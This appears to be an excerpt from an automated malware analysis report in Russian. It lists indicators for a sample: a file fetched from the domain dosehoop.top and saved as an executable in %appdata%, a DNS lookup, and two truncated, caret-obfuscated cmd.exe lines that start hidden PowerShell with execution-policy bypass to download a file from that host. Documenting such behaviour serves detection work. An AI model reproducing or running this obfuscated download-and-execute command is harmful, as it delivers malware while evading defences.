Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^W^ers^heLL^.E^Xe^ ^-eXEcUtio^N^p^olicY b^YPass -no^PRO^fI^l^e -Wi^ND^oWS^TY^l^E ^h^iDden ^(^Ne^w^-OB^JEcT ^SysTe^m^.n^e^T.W^E^b^C^LIeNt)^.^Do^WNl^O^ADF^I^le('http://dosehoop.t...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /C "pO^W^ers^heLL^.E^Xe^ ^-eXEcUtio^N^p^olicY b^YPass -no^PRO^fI^l^e -Wi^ND^oWS^TY^l^E ^h^iDden ^(^Ne^w^-OB^JEcT ^SysTe^m^.n^e^T.W^E^b^C^LIeNt)^.^Do^WNl^O^ADF^I^le('http://dosehoop.t...' (со скрытым окном)